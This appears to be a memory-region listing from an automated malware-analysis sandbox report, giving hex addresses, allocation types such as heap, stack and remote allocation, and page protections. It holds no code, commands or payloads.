heap
|
page read and write
|
||
24614000
|
heap
|
page read and write
|
||
24950000
|
heap
|
page read and write
|
||
B4357E000
|
stack
|
page read and write
|
||
13FE9E7B000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
935000
|
heap
|
page read and write
|
||
43AE000
|
heap
|
page read and write
|
||
13F80B9D000
|
trusted library allocation
|
page read and write
|
||
7F200000
|
trusted library allocation
|
page execute and read and write
|
||
43B5000
|
heap
|
page read and write
|
||
43AD000
|
heap
|
page read and write
|
||
75AF000
|
heap
|
page read and write
|
||
E7E000
|
stack
|
page read and write
|
||
43B6000
|
heap
|
page read and write
|
||
43E3000
|
heap
|
page read and write
|
||
7FF8879E0000
|
trusted library allocation
|
page read and write
|
||
13FE9EAA000
|
heap
|
page read and write
|
||
6E5F000
|
stack
|
page read and write
|
||
2694000
|
heap
|
page read and write
|
||
45D000
|
system
|
page execute and read and write
|
||
930000
|
heap
|
page read and write
|
||
13F805CE000
|
trusted library allocation
|
page read and write
|
||
5C0000
|
heap
|
page read and write
|
||
4990000
|
heap
|
page read and write
|
||
2F77000
|
heap
|
page read and write
|
||
43A0000
|
heap
|
page read and write
|
||
866D000
|
stack
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
2675000
|
heap
|
page read and write
|
||
4AD4000
|
heap
|
page read and write
|
||
43D8000
|
heap
|
page read and write
|
||
2671000
|
heap
|
page read and write
|
||
304B000
|
heap
|
page read and write
|
||
48CE000
|
heap
|
page read and write
|
||
2672000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
B437F9000
|
stack
|
page read and write
|
||
980000
|
heap
|
page read and write
|
||
2671000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
4C90000
|
trusted library allocation
|
page read and write
|
||
290E000
|
stack
|
page read and write
|
||
13F809B5000
|
trusted library allocation
|
page read and write
|
||
4ABF000
|
heap
|
page read and write
|
||
13F81DBA000
|
trusted library allocation
|
page read and write
|
||
13FEA1CE000
|
heap
|
page read and write
|
||
4A91000
|
heap
|
page read and write
|
||
7850000
|
trusted library allocation
|
page read and write
|
||
2661000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
13F81D97000
|
trusted library allocation
|
page read and write
|
||
4A95000
|
heap
|
page read and write
|
||
2693000
|
heap
|
page read and write
|
||
9DB000
|
heap
|
page read and write
|
||
8717000
|
heap
|
page read and write
|
||
935000
|
heap
|
page read and write
|
||
7FF887CF0000
|
trusted library allocation
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
4AB6000
|
heap
|
page read and write
|
||
4DCC000
|
heap
|
page read and write
|
||
2CEA000
|
stack
|
page read and write
|
||
13FE9C78000
|
heap
|
page read and write
|
||
43AF000
|
heap
|
page read and write
|
||
83C0000
|
heap
|
page read and write
|
||
247EC000
|
heap
|
page read and write
|
||
70D0000
|
direct allocation
|
page read and write
|
||
3160000
|
heap
|
page read and write
|
||
5398000
|
trusted library allocation
|
page read and write
|
||
9C06000
|
direct allocation
|
page execute and read and write
|
||
13FE9E30000
|
heap
|
page read and write
|
||
2651000
|
heap
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
43AF000
|
heap
|
page read and write
|
||
75D4000
|
heap
|
page read and write
|
||
24605000
|
heap
|
page read and write
|
||
78E0000
|
trusted library allocation
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
8960000
|
trusted library allocation
|
page read and write
|
||
8A37000
|
heap
|
page read and write
|
||
9DA000
|
heap
|
page read and write
|
||
8AA4000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
4AFF000
|
stack
|
page read and write
|
||
4EE4000
|
heap
|
page read and write
|
||
2559C000
|
heap
|
page read and write
|
||
24020000
|
remote allocation
|
page read and write
|
||
C30000
|
heap
|
page read and write
|
||
4ABB000
|
heap
|
page read and write
|
||
41B000
|
system
|
page execute and read and write
|
||
13FEA231000
|
heap
|
page read and write
|
||
2684000
|
heap
|
page read and write
|
||
4A91000
|
heap
|
page read and write
|
||
2DEE000
|
unkown
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
43A9000
|
heap
|
page read and write
|
||
6E1E000
|
stack
|
page read and write
|
||
8A37000
|
heap
|
page read and write
|
||
5345000
|
trusted library allocation
|
page read and write
|
||
48BF000
|
stack
|
page read and write
|
||
3060000
|
trusted library allocation
|
page execute and read and write
|
||
88FE000
|
stack
|
page read and write
|
||
268E000
|
heap
|
page read and write
|
||
13FE7D60000
|
heap
|
page read and write
|
||
86FB000
|
heap
|
page read and write
|
||
247EC000
|
heap
|
page read and write
|
||
437E000
|
unkown
|
page read and write
|
||
B4377C000
|
stack
|
page read and write
|
||
8A44000
|
heap
|
page read and write
|
||
26A6000
|
heap
|
page read and write
|
||
2694000
|
heap
|
page read and write
|
||
8A37000
|
heap
|
page read and write
|
||
4C91000
|
heap
|
page read and write
|
||
3221000
|
heap
|
page read and write
|
||
8A9A000
|
heap
|
page read and write
|
||
2D60000
|
heap
|
page readonly
|
||
4ABF000
|
heap
|
page read and write
|
||
4C90000
|
trusted library allocation
|
page read and write
|
||
2684000
|
heap
|
page read and write
|
||
13F902FA000
|
trusted library allocation
|
page read and write
|
||
860C000
|
stack
|
page read and write
|
||
24921000
|
heap
|
page read and write
|
||
7060000
|
direct allocation
|
page read and write
|
||
8950000
|
trusted library allocation
|
page read and write
|
||
7FF887A86000
|
trusted library allocation
|
page read and write
|
||
5044000
|
trusted library allocation
|
page read and write
|
||
B4480B000
|
stack
|
page read and write
|
||
7FF887D30000
|
trusted library allocation
|
page read and write
|
||
43CA000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
13F81A37000
|
trusted library allocation
|
page read and write
|
||
5030000
|
heap
|
page read and write
|
||
86B0000
|
heap
|
page read and write
|
||
2AA0000
|
heap
|
page read and write
|
||
13F8008D000
|
trusted library allocation
|
page read and write
|
||
536000
|
stack
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
7870000
|
trusted library allocation
|
page read and write
|
||
3009000
|
trusted library allocation
|
page read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
13F8164B000
|
trusted library allocation
|
page read and write
|
||
86AC000
|
stack
|
page read and write
|
||
7FF887D60000
|
trusted library allocation
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
8A44000
|
heap
|
page read and write
|
||
701D000
|
stack
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
2657000
|
heap
|
page read and write
|
||
4A99000
|
heap
|
page read and write
|
||
4A95000
|
heap
|
page read and write
|
||
77FD000
|
stack
|
page read and write
|
||
25093000
|
heap
|
page read and write
|
||
13FE9B50000
|
trusted library allocation
|
page read and write
|
||
459000
|
system
|
page execute and read and write
|
||
76F0000
|
heap
|
page execute and read and write
|
||
43BA000
|
heap
|
page read and write
|
||
7FF887C10000
|
trusted library allocation
|
page read and write
|
||
82E0000
|
trusted library allocation
|
page execute and read and write
|
||
266B000
|
heap
|
page read and write
|
||
B43BBF000
|
stack
|
page read and write
|
||
6F05000
|
heap
|
page execute and read and write
|
||
5031000
|
heap
|
page read and write
|
||
338D000
|
heap
|
page read and write
|
||
748E000
|
stack
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
873D000
|
heap
|
page read and write
|
||
313E000
|
stack
|
page read and write
|
||
25590000
|
heap
|
page read and write
|
||
78C0000
|
trusted library allocation
|
page read and write
|
||
43AF000
|
heap
|
page read and write
|
||
24616000
|
heap
|
page read and write
|
||
25AAF000
|
heap
|
page read and write
|
||
EFF000
|
stack
|
page read and write
|
||
13F8022C000
|
trusted library allocation
|
page read and write
|
||
30BE000
|
stack
|
page read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
8450000
|
trusted library allocation
|
page read and write
|
||
25092000
|
heap
|
page read and write
|
||
B4347E000
|
stack
|
page read and write
|
||
2690000
|
heap
|
page read and write
|
||
2683000
|
heap
|
page read and write
|
||
43A1000
|
heap
|
page read and write
|
||
24773000
|
heap
|
page read and write
|
||
7808000
|
trusted library allocation
|
page read and write
|
||
8A99000
|
heap
|
page read and write
|
||
935000
|
heap
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
2673000
|
heap
|
page read and write
|
||
43D8000
|
heap
|
page read and write
|
||
3160000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
43A0000
|
heap
|
page read and write
|
||
8AA4000
|
heap
|
page read and write
|
||
267B000
|
heap
|
page read and write
|
||
4ADC000
|
heap
|
page read and write
|
||
53B4000
|
trusted library allocation
|
page read and write
|
||
2D90000
|
heap
|
page read and write
|
||
7FF887A80000
|
trusted library allocation
|
page read and write
|
||
4B9F000
|
stack
|
page read and write
|
||
13FE7E6E000
|
heap
|
page read and write
|
||
4A91000
|
heap
|
page read and write
|
||
25AA6000
|
heap
|
page read and write
|
||
2A00000
|
heap
|
page read and write
|
||
43AF000
|
heap
|
page read and write
|
||
86ED000
|
heap
|
page read and write
|
||
935000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
25D0000
|
heap
|
page read and write
|
||
4FE3000
|
heap
|
page read and write
|
||
269F000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
836D000
|
stack
|
page read and write
|
||
6F8E000
|
stack
|
page read and write
|
||
4ABF000
|
heap
|
page read and write
|
||
88B0000
|
trusted library allocation
|
page execute and read and write
|
||
43AD000
|
heap
|
page read and write
|
||
26A6000
|
heap
|
page read and write
|
||
25FB5000
|
heap
|
page read and write
|
||
5361000
|
trusted library allocation
|
page read and write
|
||
26A2000
|
heap
|
page read and write
|
||
4F2E000
|
stack
|
page read and write
|
||
297F000
|
stack
|
page read and write
|
||
4AA1000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
7FF887C90000
|
trusted library allocation
|
page read and write
|
||
2EFF000
|
unkown
|
page read and write
|
||
7FF887BB5000
|
trusted library allocation
|
page read and write
|
||
4AB6000
|
heap
|
page read and write
|
||
336B000
|
heap
|
page read and write
|
||
78F0000
|
trusted library allocation
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
8AA4000
|
heap
|
page read and write
|
||
3020000
|
trusted library allocation
|
page read and write
|
||
2692000
|
heap
|
page read and write
|
||
13FE7F65000
|
heap
|
page read and write
|
||
8AA4000
|
heap
|
page read and write
|
||
24631000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
13F80B96000
|
trusted library allocation
|
page read and write
|
||
2930000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
983000
|
heap
|
page read and write
|
||
4ADC000
|
heap
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
25AAC000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
D806000
|
direct allocation
|
page execute and read and write
|
||
24888000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
25FCB000
|
heap
|
page read and write
|
There are 963 hidden memdumps, click here to show them.